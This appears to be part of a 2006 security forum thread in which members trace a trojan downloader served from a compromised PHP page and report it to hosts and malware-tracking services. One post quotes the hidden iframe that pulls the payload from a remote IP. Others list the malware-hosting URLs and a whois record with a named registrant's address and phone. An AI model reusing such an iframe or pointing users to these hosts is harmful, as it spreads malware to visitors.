Page 2 of 2 FirstFirst 12
Results 11 to 19 of 19

Thread: Horsie.......

  1. #11
    FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
    <iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
    That site is down with a message saying the account is suspected due to violation of AUP - good.

    Kinda hoped to pull down that horsie and analyze and disect it, oh well.

  2. #12
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718
    Originally posted here by ric-o
    FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.

    That site is down with a message saying the account is suspected due to violation of AUP - good.

    Kinda hoped to pull down that horsie and analyze and disect it, oh well.

    Still a live link, just got another (same one as before) Trojan in my Quar.

    W32/Sober@MM!M681


    Get some good religion from Bad Religion.

  3. #13
    Member
    Join Date
    Sep 2005
    Posts
    77
    http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all

    One Whois lookup says its from the Ukraine.... another says its from Belarus:

    Country fraud profile: High
    Georgia prison wardens......Ukranian mafioso....
    Hmmm
    %42%75%75%75%75%72%70%21%00

  4. #14
    They call me the Hunted foxyloxley's Avatar
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,534
    One Whois lookup says its from the Ukraine.... another says its from Belarus:
    same area of land
    and Georgia is also out there too
    not just in the USofA

    maybe that's how you picked such a lovely site

    and clicking the link sent AVG nuts
    got two hits

    those two hits have different dates on em
    but I am certain I've checked the vault recently, and I haven't sent anything else there for a while
    so now I'm in my SIXTIES FFS
    WTAF, how did that happen, so no more alterations to the sig, it will remain as is now

    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone

  5. #15
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    !!!!!!!!!!

    No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

    Get some good religion from Bad Religion.

  6. #16
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356

    Re: !!!!!!!!!!

    Originally posted here by Galdron
    No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

    You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary That's what I usually do to submit things semi-anonymously
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  7. #17
    Banned
    Join Date
    Jul 2006
    Location
    /
    Posts
    385
    Originally posted here by nihil
    Hi acidtone, can you submit them to these sites:

    http://virusscan.jotti.org/

    http://www.virustotal.com/en/indexf.html

    It would be interesting to see what the major AV products make of them?

    Nihil, i've already submitted them, i did so about 30minutes after catching them into an contained environment.

    cheers
    acidtone..

  8. #18
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    Re: Re: !!!!!!!!!!

    Originally posted here by nebulus200
    You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary That's what I usually do to submit things semi-anonymously

    Done deal.

    Get some good religion from Bad Religion.

  9. #19
    T3h Ch3F
    Join Date
    Sep 2001
    Posts
    718

    The continuing saga

    Damnit I am obsessed!


    OK so I just can't let this one go, after Zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.


    I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.

    Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?

    The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.

    http://proffy209.com/

    Dig-

    Registrant:
    Boris D Gorbunov boris@bo.ca
    7.49800872092
    Boris D Gorbunov
    Proletarskaya 3-10
    Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
    Domain Name: proffy209.com
    Record last updated at 2006-07-13 12: 42: 55
    Record created on 2006/7/13
    Record expired on 2007/7/13
    Domain servers in listed order:
    ns1.game4all.biz ns2.game4all.biz
    Administrator:
    name: (Boris D Gorbunov)
    Email: boris@bo.ca
    tel-- 7.49800872092
    Boris D Gorbunov
    Proletarskaya 3-10


    Boris I would like to kick your Caviar eating a$$.

    The Virus itself is also known as TR/Dldr.Tibs.C, which copies itself to • %SYSDIR%\kernels8.exe, is a Multifaceted little bugger.

    Further info can be found @ link below.

    http://www.avira.com/en/threats/sect...dr.tibs.c.html


    Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.

    Get some good religion from Bad Religion.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •